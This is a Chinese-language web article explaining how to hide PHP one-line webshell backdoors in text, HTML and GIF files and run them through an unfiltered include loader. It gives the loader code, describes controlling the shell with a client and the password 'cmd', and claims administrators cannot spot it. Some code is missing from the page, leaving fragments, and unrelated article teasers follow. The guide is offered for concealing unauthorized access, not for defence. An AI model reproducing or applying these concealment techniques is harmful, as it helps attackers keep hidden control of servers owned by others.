關於PHP後門的隱藏技巧
很多人都有一個疑問,是否能把我那一句話木馬隱藏到HTML或圖片裏,其實把一句話木馬插入到PHP文件中就已經很隱蔽了,如果説硬是要放到 HTML文件或圖片裏,那就看看小編為大家搜索整理的PHP後門的隱藏技巧,希望能給大家帶來幫助!更多精彩內容請及時關注我們考試網!
要知道如果光把PHP語句放到圖片裏是無論如何也不能執行的,因為PHP只解析擴展名為php的文件。所以説要能使隱藏在圖片裏的PHP語句執行。我們就的藉助PHP中的調用函數 :include 、require 等。
記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件裏用include("x.gif")這樣的語句來調用隱藏在圖片的木馬語句。ASP中語句也類似。看似非常隱蔽但直接調用圖片對稍微懂點PHP的人就不難發現可疑之處。由於URL 裏用GET方式很難傳遞參數,這就使得插入木馬的性能得不到發揮。
Include 函數在PHP中使用的比較頻繁,所以引起的安全問題也實在太多,例如PHPWIND1.36的漏洞就是因為include後面的變量沒做過濾引起的。由此我們就可以構造類似的.語句來插入到PHP文件中。然後把木馬隱藏到圖片或HTML文件裏,可以説隱蔽性就更高了。如在PHPWIND論壇裏插入下面的語句:<‘’?@include> 一般管理員是無法看出來的。
有了include 函數來輔助幫忙我們就可以把PHP木馬隱藏到 諸如 txt、html和圖片文件等很多類型的文件裏來了。因為txt、html和圖片文件這三種類型的文件最無論在論壇還是文章系統裏是最為常見的了,下面我們就依次來做測試。
首先建立一PHP文件 文件內容為:
$test=$_GET[test];
@include test/.$test;
?>
Txt文件一般都是説明文件,所以我們把一句話木馬放到目錄的説明文件裏就OK了。隨便建立一個TXT文件。我們把一句話木馬粘貼到 文件裏。然後訪問 http://localhost/test/ 如果你看到的內容就證明Ok了, 然後把在lanker微型PHP後門客户端 木馬地址添入 http://localhost/test/ 密碼裏添入cmd就可以了,執行返回的結果都可以看到。
對於HTML的文件,一般都為模版文件。為了使插入到HTML的文件的木馬能被調用執行而且不被顯示出來,我們可以在HTML里加入一個隱藏屬性的文本框 ,如: 然後使用方法同上。執行的返回結果一般都可以查看源文件看到。 如使用查看本程序目錄功能。查看源文件內容為 我可以得到目錄為 C:Uniserver2_7swww est。
下面我們説説圖片文件,要説最為毒的一招莫過於把木馬隱藏到圖片裏。我們可以直接對一個圖片進行編輯,把插入到圖片末尾
經測試一般都不會對圖片造成影響。然後同樣方法客户端木馬地址添入
我們查看PHP環境變量 返回的是結果是原圖片。
這裏可能要和我們想象的結果有些差距了,其實命令已經運行了,只是返回的結果看不到而已,因為這是真正的GIF文件,所以是不會顯示返回結果的,為了證明是否真的執行了命令我們執行上傳文件命令。果不出所料,文件已經成功上傳到服務器上。這樣偽造的優點是隱蔽性好。缺點也自然不用説了是沒回顯。如果你想看到返回的結果,那就拿出記事本偽造一個假的圖片文件吧。
到這裏就基本測試完了,怎樣隱蔽PHP後門就看你自己的選擇了。行文倉促,如有不妥之處,請指出!
-
win2008 ASP顯示500內部錯誤不能顯示詳細錯誤的解決方法
在win2008系統中,有用户遇到這樣的情況:網站後台顯示500內部錯誤,但是卻無法打開詳細的錯誤信息。無法查看詳細的錯誤信息,用户就不能根據具體問題來解決了,這是一件很麻煩的事情。其實用户可以通過修改win2008系統中的IIS設置來顯示這個詳細的錯誤信息。一、造成50...
-
關於jQuery實現鼠標單擊網頁文字後在文本框顯示的方法介紹
本文實例講述了jQuery實現鼠標單擊網頁文字後在文本框顯示的方法。分享給大家供大家參考。具體實現方法如下:張三李四王五趙六選擇姓名$("ulli")k(function(){vartext=$(this)();$("input")("");$("input:checked")nts("td")ings("td")dren("input")(text);})希...
-
SQl常用增刪改查模板
篇一:SQl常用增刪改查SQL常用增刪改查語句增加現在有一張表,表(Test)裏面有三個字段,分別為sno,sname,age。舉例用一條增加SQL語句,插入一條數據進庫。語句:Insertinto表名value(‘數據1’,’數據2’,’數據3’)具體操作:Insertintotestvalues('test','te...
-
如何理解Javascript的caller,callee,call,apply區別
在提到上述的概念之前,首先想説説javascript中函數的隱含參數:argumentsarguments該對象代表正在執行的函數和調用它的函數的參數。[function.]arguments[n]參數function:選項。當前正在執行的Function對象的名字。n:選項。要傳遞給Function對象的從0開始的參數值...